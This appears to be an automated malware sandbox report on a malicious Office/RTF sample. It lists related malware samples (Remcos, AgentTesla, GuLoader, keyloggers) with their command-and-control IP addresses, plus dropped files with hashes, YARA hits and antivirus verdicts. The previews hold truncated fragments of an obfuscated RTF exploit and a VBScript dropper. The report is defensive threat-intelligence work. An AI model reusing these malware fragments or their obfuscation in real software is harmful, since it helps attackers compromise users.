      DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
      • 188.114.97.3
      Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
      • 188.114.97.3
      AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
      • 188.114.96.3
      RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
      • 188.114.96.3
      RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
      • 188.114.96.3
      Quotation.xlsGet hashmaliciousRemcosBrowse
      • 188.114.96.3
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      CLOUDFLARENETUSFirst order.exeGet hashmaliciousAgentTeslaBrowse
      • 104.26.12.205
      waybill_shipping_documents_original_BL_CI&PL_29_07_2024_000000002024_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
      • 188.114.96.3
      RFQ New Order - 57m#U00b3 LPG SEMI TRAILER 7 NOS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
      • 188.114.96.3
      Confirmaciones de datos bancarios.xla.xlsxGet hashmaliciousUnknownBrowse
      • 172.67.139.214
      DHL-AIR-WAYBILL.batGet hashmaliciousAgentTeslaBrowse
      • 104.26.12.205
      0001.lnkGet hashmaliciousUnknownBrowse
      • 188.114.97.3
      Confirmaciones de datos bancarios.xla.xlsxGet hashmaliciousUnknownBrowse
      • 172.67.139.214
      POSH20240605.xlsGet hashmaliciousRemcosBrowse
      • 188.114.96.3
      Confirmaciones de datos bancarios.xla.xlsxGet hashmaliciousUnknownBrowse
      • 104.21.62.224
      https://wetransfer.com/downloads/830bc96eb2eb4785db402d6fabf2a95a20240729145853/ba6656d91fecbcdaba8c5090e74a7ba720240729145856/21b675?trk=TRN_TDL_01&utm_campaign=TRN_TDL_01&utm_medium=email&utm_source=sendgridGet hashmaliciousHTMLPhisherBrowse
      • 104.18.94.41
      AS-COLOCROSSINGUSwaybill_shipping_documents_original_BL_CI&PL_29_07_2024_000000002024_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
      • 104.168.45.34
      POSH20240605.xlsGet hashmaliciousRemcosBrowse
      • 192.227.225.166
      Packing_List.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
      • 192.210.215.11
      orden de compra BF-161000401.vbsGet hashmaliciousAgentTeslaBrowse
      • 192.3.216.148
      skIebSeoYQ.elfGet hashmaliciousUnknownBrowse
      • 192.210.206.76
      rDHLESTADODECUENTA-65346577664557687757645768.exeGet hashmaliciousGuLoaderBrowse
      • 192.3.216.142
      AWB 98996013276..xlsGet hashmaliciousUnknownBrowse
      • 192.3.176.154
      AWB 98996013276..xlsGet hashmaliciousUnknownBrowse
      • 192.3.176.154
      AWB 98996013276..xlsGet hashmaliciousUnknownBrowse
      • 192.3.176.154
      zS7xI6K57I.rtfGet hashmaliciousRemcosBrowse
      • 192.3.176.174
      AS-COLOCROSSINGUSwaybill_shipping_documents_original_BL_CI&PL_29_07_2024_000000002024_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
      • 104.168.45.34
      POSH20240605.xlsGet hashmaliciousRemcosBrowse
      • 192.227.225.166
      Packing_List.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
      • 192.210.215.11
      orden de compra BF-161000401.vbsGet hashmaliciousAgentTeslaBrowse
      • 192.3.216.148
      skIebSeoYQ.elfGet hashmaliciousUnknownBrowse
      • 192.210.206.76
      rDHLESTADODECUENTA-65346577664557687757645768.exeGet hashmaliciousGuLoaderBrowse
      • 192.3.216.142
      AWB 98996013276..xlsGet hashmaliciousUnknownBrowse
      • 192.3.176.154
      AWB 98996013276..xlsGet hashmaliciousUnknownBrowse
      • 192.3.176.154
      AWB 98996013276..xlsGet hashmaliciousUnknownBrowse
      • 192.3.176.154
      zS7xI6K57I.rtfGet hashmaliciousRemcosBrowse
      • 192.3.176.174
      No context
      No context
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.025510077899887827
      Encrypted:false
      SSDEEP:6:I3DPcTUKeRvxggLRTUxo6sv57pltRXv//4tfnRujlw//+GtluJ/eRuj:I3DPl/UxLa57XvYg3J/
      MD5:A147871792B6C37308E465B9306B19C6
      SHA1:6F50B31359BA74E1C22919EA807BB472B7CAA393
      SHA-256:E4D5EB9869E3CBF31F65B2E46935292BB9D650A829FE7E4A11D5AD34A624B6D6
      SHA-512:00575DD2648C18AA5946AF2B69B40150C3E7077905D3E23635578D4BC993ABD73D6CBA73D985CEB3DB455DF0AFF77C116B3D9A36CA1AB9AF33AD1C691A276BA5
      Malicious:false
      Reputation:low
      Preview:......M.eFy...zY#y.:..L.......^S,...X.F...Fa.q................................b.`L...sH.c............V.b|D.u.I.eJ.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):4760
      Entropy (8bit):4.834060479684549
      Encrypted:false
      SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
      MD5:838C1F472806CF4BA2A9EC49C27C2847
      SHA1:D1C63579585C4740956B099697C74AD3E7C89751
      SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
      SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):64
      Entropy (8bit):0.34726597513537405
      Encrypted:false
      SSDEEP:3:Nlll:Nll
      MD5:446DD1CF97EABA21CF14D03AEBC79F27
      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
      Malicious:false
      Reputation:high, very likely benign file
      Preview:@...e...........................................................
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Rich Text Format data, version 1
      Category:dropped
      Size (bytes):96629
      Entropy (8bit):2.789674812127989
      Encrypted:false
      SSDEEP:768:mROe6H9B/3YLNQmIQ6B2QdKjKn6/FZEaO3QC4kE9yS:mR56XfONQmIQ6B2Q1n6DEaOgcEL
      MD5:FBC6766776E17FFA02A6813E4F20B22B
      SHA1:58110A9F8F62038BD95EEA66C74523320F075176
      SHA-256:B5D48E4AA15901A84AD2C00A6B6A228471C3E5AD695F7EA11E584AFA43543A69
      SHA-512:0590D964829DEE86A4D61460BCF0568234846A96BACB022ECABBDDB251867AA00010B942A02B77757656D66AC007BC48C39848703FB2D5EEDD30CE7A40FAAAA8
      Malicious:true
      Yara Hits:
      • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethesimplethingstobeunderstandeverythingverygreattoseetheatallfinetogetmebackwithentirethings________youreallyhappeyseeyou[1].doc, Author: ditekSHen
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      Preview:{\rtf1.......{\*\lineCrMod152884956 \#}.{\2934712125=]???4`;^?*!448.;9%(<.6?$..;05>.4,0?3*$</?%<9])1[`-'?-~;`4%.@??;%5.,#?),%*?91)7*8+47?!>-_?..61%3=0_!~3*5*[<.*?]&2(357%??^?7>(;?[!8[_^$[3(+?]<?2`>654[~:6-/7.4$^..#?10&`:)`8?5.1-_|1&)6>%:@3?.!?#[.?19[~?14'36%309&?&$;<2)().~=+??%'9.<0-%3?2|8;0:%_&7?&('+[9@1=,~).9#|:0.116%=_'1:=.%?*-`)0<8.&.?1]==!:4_?*|:*,,%@$#/5].,4`]|6!0)``@$?_%`#5@8!*|(*)~2]);_^^,%=+-+>'($]$%%`?=].%~>$7.();7+=$:*.,>5#,'=(`!;;3%?7*)?@./$?;;?)4*,?,5-~3?;2~(?@4@?^17>?&_~?^*'-?.#%*<[97@?&7-=:8.8)&^%!_!~^8)|%<`.3%=!#:;1&#80_577?46;&^:..,.??4.*/*.5@^($^.4,&`%.&?<??$1..3?4%&]<7|~3~9=?98+.'?,*!)_/(.5?$.0]?(7:0)*0<32?;@74.%%7*_1~*1-&$#=5*&,.[>+8:~,?`<'?(.,^]3'|`.'*7=!#|=-?.5%-#[?/`-][]$6>:?+9?#.5&#>.^%)`+-|;2%15+>3.90.~;;?:[08??]5%$0<?468!!-:`).-.9^33=!?.&9.%-?,]1#]~>?;0.6`,?_2%%%?7|8)_:37^?58?|?1/>|2<=65_.25'&;[?+?<@#`_#|,#57:6?<)2`,%?!_%%]6].?)#%@!((=?=@$]|]][^`[19=*.105&`=<]!=3+2#$%11?_[[*:1>2%[3=;3?.4)`[%+,4?#8[?$/|'/(..00%7.-7*7^/;(.%+5)^>'/&|?*?.'8).[_*_6~2)'?8+?>0_#'6!+/
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):421468
      Entropy (8bit):3.570272506767291
      Encrypted:false
      SSDEEP:3072:KHG9wf2YF/hNe4VTdRnTT8w4TWU7qtg/gl7p+lH1dS7tGd0LoJS7Et3Z+vYH:hwf2YFK7qi
      MD5:A7134156DC3A01AC743ED671C6FCE261
      SHA1:462834C8EAC709F4F6AE14DC8E88F8238B08CBE5
      SHA-256:96EBA88A40E1B29630E4D0CD374F3FE9B45EE1AD2F86821E824BF97D821A5CAE
      SHA-512:E473905BABF5515B8138AB83DA6946DFB7970C83FECD681659D3DD7A10CF0A7380FAB1C01D9C3931BAB0ECD25CDE09BC9B2D94BA1BFB4C21330DBD25EFD1545B
      Malicious:false
      Preview:..d.i.m. .t.h.e.r.m.i.a.t.r.i.a.E.E. .....t.h.e.r.m.i.a.t.r.i.a.E. .=. .p.a.g.o.d.e.i.r.o.........t.r.i.e.n.n.a.d.o.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.1._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.2._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.3._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.4._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.5._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.6._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.7._.0._.M.e.s.s.a.g.e.".). .&. .t.h.e.r.m.i.a.t.r.i.a.E. .&. ._.....t.r.i.e.n.n.a.d.o.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.8._.0._.M.e.s.s.a.g.e.".).
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):4703908
      Entropy (8bit):4.107863107176272
      Encrypted:false
      SSDEEP:24576:YH/4ri2lg1Rde3nwLWKZ1ewZQ9at3wwKuWh1Owcl:Rg1Rde3nwTZ1ewZQ9at3wwkh1Owcl
      MD5:99A3D50818F85879071FDFC3A2E4B7F1
      SHA1:412416A194B2DBA448DF2C3FE375C73038BB1DFD
      SHA-256:F871B050F887A068E2888C39FFDC521FB8DAE47B27A7D1E1CCD4BFE4A1E00561
      SHA-512:7454BB4DC951795D75F64D859371914D03171EA5A05E67070FA6FEBC91CDB361941AD5E535EAF725998BB9018A5200AA29E72C036CA49F9DD052DD9B98C9C3C1
      Malicious:false
      Preview:....l..........._................T...F.. EMF......G.~.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................&...........................%...........................6...............%...........L...d...................................!...
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):3419212
      Entropy (8bit):4.086917113484708
      Encrypted:false
      SSDEEP:12288:Y1MdPI5R32GnjPjIwcusrwvsWXKcnXfxpMZacUkRaN7Hjo1PWwwD8dt3iGnjPjIQ:Y+OR30wOSKx1Owwat3wwKuWh1OwiQg
      MD5:EDDE33A97B39D84D37692223B9C0F45C
      SHA1:2C1212A050135455CA5A8E5706480A6DBB750544
      SHA-256:03D503458F767985CAC0B44C6676284613A711DBDE4410B36D5705840AF6D0E2
      SHA-512:A96B5D4DE4C957ACC1471E51780D462F39E3EF80352E6883A63DBAC2CC7EA123658DF97C8ED9ECD5AA4BC54FA9B6A78D2D562C4AD1C93BA16FD26FD550596B40
      Malicious:false
      Preview:....l..........._...r...........QN...a.. EMF....L,4.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):7304
      Entropy (8bit):3.412642571176521
      Encrypted:false
      SSDEEP:48:SsIz+zVyTYbheEdLtaREAF2pdfwfDaKfL4mNCuW1edGV:S5zQMTY95dsyka1qDgZ
      MD5:56EAF38719E6D6D96641C9B6C9DCD796
      SHA1:05ED12A4E7D8A85CA31083D0C2138BBC57A50523
      SHA-256:90AE851952E92612ABF55601A1AEF6A9F7949B5560AB6B5E5B94E6F6298E2549
      SHA-512:07E5052172EDC67C510B5CA5624A8F09680D1CCF8A63D6DDC7A02B30E60B4A3F1C51EDA35983985F4A9F3F6ADBD07CA9EA55136757089539F15FBDA6C9F77015
      Malicious:false
      Preview:....l...........X...<................... EMF................................8...X....................?..............................c...C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.......d.......................P.....7q....\.....................7q.........V.v..7q......7q.....{.wp..................w....$.......d.......4...*]8q.....]8qh...p...(.......-......V<.w................<.rv.\.v....X.2S...............................vdv......%...................................r...............E...'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................bdg.ruw.ruw.ruw.ruw.ruw.ruw.ruw.ruw.ruw.ruw.ruw.ruw.ruw.ruw.ruw.ruw.ruw.ruw.ruw.ruw.ruw.ruw.ruw.ruw.ruw.ruw.ruw.
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):169096
      Entropy (8bit):3.369564690022728
      Encrypted:false
      SSDEEP:1536:WK83moqvL5TWvyvcSg2JjEeSxqLY5ml1re71NmWqnb11ruEA9TAe:WF3H2t4Sg2JjEWE5mSZB
      MD5:DCF8C56CAB759D132AD0B11703B8015C
      SHA1:C656AF02D26A18CE716A28C36B34BEE75D00E2B4
      SHA-256:38F17A599AC5D645DF3840BBB401710EF81573A747DA20ABBFC1B7D9A9273B58
      SHA-512:F6A9BAEA096279DBDBFD370B26899D259ED6B6DAFA8042594389523EA210CBECDC14ADD78AB7568E1C3EC8C0DF7AFCCAAD0ED7E22A879F6023C8317B6712973C
      Malicious:false
      Preview:....l...........[...y...........%...J... EMF................................@.......................0]..8...Q...............[...y...................\...z...P...(...x........... ...\...z...(...Z...z..... .......................................................................................................................]..V...e,..g...\ ..Q...[...M...]!..V...Q...W...\...h/..i1..Y...\...L...Y...^"..M..~G..}G..}F..}F..}F..}F..}F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..}G...L......................................................................{{{..................................................................................................................................................................................................................................................................................................N...S...S...S...W...X...g...h0..Y...T...W...O...^"..b(..M...M..._$.
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 731 x 391, 8-bit/color RGB, interlaced
      Category:dropped
      Size (bytes):114223
      Entropy (8bit):7.9934212565976415
      Encrypted:true
      SSDEEP:1536:cX9THBYT6A17j6ZE4+ZVkVIXMK7MpNc+Bj5uuUBQp12RTmmPHFSTm:QTHBq6U/6xVsMKgpNc+ZwuURRTd9STm
      MD5:7F72BA3C4366E5F9603DC0FE9C70D4E4
      SHA1:FA3DACFB4E2ECA8BFAFCCE8BE5ADE7EE7B3722F1
      SHA-256:4BD578FBCFC208744CFEC575FEC397A77AF66D5688E0C3CD034B4628EFDF910A
      SHA-512:B8B7B8D4441609F64AF477301355BC8DAE84A16EA595A4923391530F2EE6F4B3F85437541F6408398593D3E1223B56FFCEBEB119C43D97C6213C640799CA6863
      Malicious:false
      Preview:.PNG........IHDR...............9x....sRGB.........gAMA......a.....pHYs..........+......IDATx^......c7..7z.J !.@..ww.`..........-.......|......d.g..........g...]...*.<.\.l/.......e...w..Q...\.y..qR.0.$&M.D..^....O...M.../...e.6....$..=..M.'a.@JQz.y.....4..a>p.....N.....>E."..z....C...U.W^..qc...Z.f.).........S.D.}...c...t.R.x..e..$...........T.i.&...+J.,...&!f%....;$.+!(.J...ZPe.....RJ..-.Q....l.v..._~.e).....T...a.w.......Jy..E1<>S.....q...T...Z.'.O)A....l..M...Qz.....=...I.3|..}.Y.|....9...6m.0<...q..+V<u......}.](..W_}.....,0U.......[....'.....]..L.2_|..Y.-Z4....N)%A..o..&..{..e.H...../]..[..)..[....9.K...{.c.j-r..o......t.TA............*q..q._}..].4...L..'K.fG..M........,. ....;.]C.[...4i.h......$I.t...E..5..x....>}....N..'L..}.....#+.~.H.N.8A.Pf.M.[.,Xp.%.$....n.:....(..$......N.J+.o.>t1n.8.......#R.{.....^...r..*r+.{.I.7o.V.i.E@.....e.B}G\Dl....R.@.*.u......}..`j..n.8..J.a.g.|-cc..v.Z..-._,Z..{...o..y.f.
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):4849612
      Entropy (8bit):4.320158287963311
      Encrypted:false
      SSDEEP:24576:waqH+3l4ri2AdVhFW3fwDmqJ1+w5SDat3wwKuWh1OwS0:1DdVhFW3fwbJ1+w5SDat3wwkh1OwS0
      MD5:F2D25F423137AD7D154E3B236A31BC69
      SHA1:794B7BA66B5FEEA3286D38042E2FEF7221F4BB47
      SHA-256:B28A4E226AED4BBC6E9C112BC613322E232D3A411F36DCB75AD37DF2613D5A94
      SHA-512:16253386F6271123E1AFBF0EFD1C5CC644B5BF508C92F3FAAADC0560803DB16AEEA001022BEC6471CD7A83C006B83357D69975B32D9428996E5F130FD5F36FEF
      Malicious:false
      Preview:....l............................]...L.. EMF......I.............................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................I..."...........!...................................................I..."...........!...................................................I..."...........!...................................................I..."...........!...................................................I..."...........!...................................................I...'.......................%...........................................................&...........................%...........................6...............%...........L...d...................................!...
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):45620
      Entropy (8bit):3.1406163243851553
      Encrypted:false
      SSDEEP:384:IldDFWTxQ22+xTVIszvuFctymi95Yu78SzgeRIh7Ug7JF04Jzvwa8:Ilv2B2gdTuEQyur4Ug7v04Jzv58
      MD5:6CAD904DB7A831B89755C9A6DAFAF593
      SHA1:25416149BACA19B81BDDA610DB42B2490413530F
      SHA-256:00D3901E04E8C019FC676DA5442FB64925FCA77B98674292D4E3EBBD495894EE
      SHA-512:0D5252F0EA86CB912731B4A2479F130A3497B7A191D9E17FF208D8AFCBE031E9AD0BBABAEF683F61B6BF99369ACBCEFAA8B627446765529A2424CC71500F7C7A
      Malicious:false
      Preview:....l...........;...............~@..xW.. EMF....4...G.......................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%.......................R...p................................@..T.i.m.e.s. .N.e.w. .R.o.m.a.n..........................................................................w............0.,.....(.,.....0.,............. .......(.,.....(.,.....0.,.....G................*..Ax...N..............T.i.m.e.s. .N.e.w. .R.o...F.....6.................,.................................................dv......%...........%...........%.......................T...T...........+...q........i.@...@....Z.......L...............<.......P... ...,...............T...T...,.......W...q........i.@...@,...Z.......L...............<.......P... ...,.......................................T...T.......s...+............i.@...@........
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:Rich Text Format data, version 1
      Category:dropped
      Size (bytes):96629
      Entropy (8bit):2.789674812127989
      Encrypted:false
      SSDEEP:768:mROe6H9B/3YLNQmIQ6B2QdKjKn6/FZEaO3QC4kE9yS:mR56XfONQmIQ6B2Q1n6DEaOgcEL
      MD5:FBC6766776E17FFA02A6813E4F20B22B
      SHA1:58110A9F8F62038BD95EEA66C74523320F075176
      SHA-256:B5D48E4AA15901A84AD2C00A6B6A228471C3E5AD695F7EA11E584AFA43543A69
      SHA-512:0590D964829DEE86A4D61460BCF0568234846A96BACB022ECABBDDB251867AA00010B942A02B77757656D66AC007BC48C39848703FB2D5EEDD30CE7A40FAAAA8
      Malicious:true
      Yara Hits:
      • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC991353.doc, Author: ditekSHen
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      Preview:{\rtf1.......{\*\lineCrMod152884956 \#}.{\2934712125=]???4`;^?*!448.;9%(<.6?$..;05>.4,0?3*$</?%<9])1[`-'?-~;`4%.@??;%5.,#?),%*?91)7*8+47?!>-_?..61%3=0_!~3*5*[<.*?]&2(357%??^?7>(;?[!8[_^$[3(+?]<?2`>654[~:6-/7.4$^..#?10&`:)`8?5.1-_|1&)6>%:@3?.!?#[.?19[~?14'36%309&?&$;<2)().~=+??%'9.<0-%3?2|8;0:%_&7?&('+[9@1=,~).9#|:0.116%=_'1:=.%?*-`)0<8.&.?1]==!:4_?*|:*,,%@$#/5].,4`]|6!0)``@$?_%`#5@8!*|(*)~2]);_^^,%=+-+>'($]$%%`?=].%~>$7.();7+=$:*.,>5#,'=(`!;;3%?7*)?@./$?;;?)4*,?,5-~3?;2~(?@4@?^17>?&_~?^*'-?.#%*<[97@?&7-=:8.8)&^%!_!~^8)|%<`.3%=!#:;1&#80_577?46;&^:..,.??4.*/*.5@^($^.4,&`%.&?<??$1..3?4%&]<7|~3~9=?98+.'?,*!)_/(.5?$.0]?(7:0)*0<32?;@74.%%7*_1~*1-&$#=5*&,.[>+8:~,?`<'?(.,^]3'|`.'*7=!#|=-?.5%-#[?/`-][]$6>:?+9?#.5&#>.^%)`+-|;2%15+>3.90.~;;?:[08??]5%$0<?468!!-:`).-.9^33=!?.&9.%-?,]1#]~>?;0.6`,?_2%%%?7|8)_:37^?58?|?1/>|2<=65_.25'&;[?+?<@#`_#|,#57:6?<)2`,%?!_%%]6].?)#%@!((=?=@$]|]][^`[19=*.105&`=<]!=3+2#$%11?_[[*:1>2%[3=;3?.4)`[%+,4?#8[?$/|'/(..00%7.-7*7^/;(.%+5)^>'/&|?*?.'8).[_*_6~2)'?8+?>0_#'6!+/
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:Composite Document File V2 Document, Cannot read section info
      Category:dropped
      Size (bytes):16896
      Entropy (8bit):5.766875830368241
      Encrypted:false
      SSDEEP:384:+xPwSV53PTSeM5sPvSMM5sPvSMM5iPTSMM5:Yv2hvTXTVT
      MD5:0F38DD8F09AD1FE747D88DB3A0D3D8F5
      SHA1:8C9D5FCDC1624B91AEE63DEA29B551D4EDF48A5C
      SHA-256:CDE61389226337397B01E677FD04940F9D563C940931A529E8DE7CFD4657BF7F
      SHA-512:BDAAEB1BABEDB2641CFF9B3EF70A5658E32D51AD0ABD822E1ADDF2ADCE41357D51E9908D431DAC426D270B1E82F313F86DFDD359BC0D07F7D8F9F64237E9AB2D
      Malicious:true
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1024
      Entropy (8bit):0.05390218305374581
      Encrypted:false
      SSDEEP:3:ol3lYdn:4Wn
      MD5:5D4D94EE7E06BBB0AF9584119797B23A
      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
      Malicious:false
      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):16384
      Entropy (8bit):3.5746146258381843
      Encrypted:false
      SSDEEP:384:HvDDep0ns5v0a6v6zgcJt1TwBltgv/3sQvs2O26253cK4rDKZ:H3m0sRFC4gcT1TwBlOv/cQq25M1GZ
      MD5:A86778DE211C9DFB34BEAE905E5C0377
      SHA1:905E64420E1C08F0FFF4810A228888A09AA38DE2
      SHA-256:726E5E9B6FAE795D89EFC0E7ACC23A4227F5047288474902755098E72F55FAB6
      SHA-512:80D3201134BFAF2E0C4DFF26C346088E859D3DB6122380974EE3FA9DB577A847E8A5CBC69ABF14E16D9FB942703A3CFFC70490F5B8723D08827722A540BDB7E3
      Malicious:false
